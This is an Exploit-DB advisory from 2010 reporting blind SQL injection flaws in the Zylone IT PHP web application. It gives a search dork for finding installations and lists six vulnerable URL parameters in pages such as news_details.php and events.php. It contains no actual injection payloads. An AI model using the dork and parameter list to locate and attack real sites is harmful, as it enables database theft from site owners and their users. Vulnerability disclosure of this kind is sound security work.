Zylone IT - Multiple Blind SQL Injections

EDB-ID:

14270

CVE:

N/A

EDB Verified:

Author:

Callo

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-07-08

Vulnerable App:

# Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability
# Date: 2010-07-08
# Author: Callo
# Software Link: http://www.zylone.com/
# Version: Unknown
# Tested on: php

10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability               0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Date: 2010-07-07                                                          0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Author: Callo                                                             0
0 ~# Home: www.gsk2.org                                                        1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Software Link: http://www.zylone.com/                                     1
1 ~# Version: Unknow
0 ~# Tested on: php                                                            1
1 ~# Dork: Powered by Zylone IT                                                0
0          Powered By: Zylone IT                                               1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]    1
1             http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]             0
0             http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]     1
1             http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]            0
0             http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]           1
1             http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]           0
0                                                                              1
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Greetz: Whivack                                                           1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services